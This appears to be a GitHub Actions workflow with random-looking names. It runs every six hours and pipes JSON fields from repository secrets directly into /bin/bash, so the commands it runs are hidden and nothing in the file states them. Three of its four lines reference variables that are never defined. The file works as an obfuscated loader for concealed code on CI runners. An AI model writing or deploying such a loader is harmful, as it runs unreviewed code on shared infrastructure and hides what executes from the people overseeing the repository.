name: luorenzong1098

on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luorenzong1098
        env:
          iemvu37478: ${{ secrets.iemvu37478 }}
        run: |
          echo $iemvu37478 | jq -r .xzr9 | /bin/bash
          echo $u9 | jq -r .o8463 | /bin/bash
          echo $xt139 | jq -r .ozu28338 | /bin/bash
          echo $qilar968 | jq -r .wmzqn041 | /bin/bash

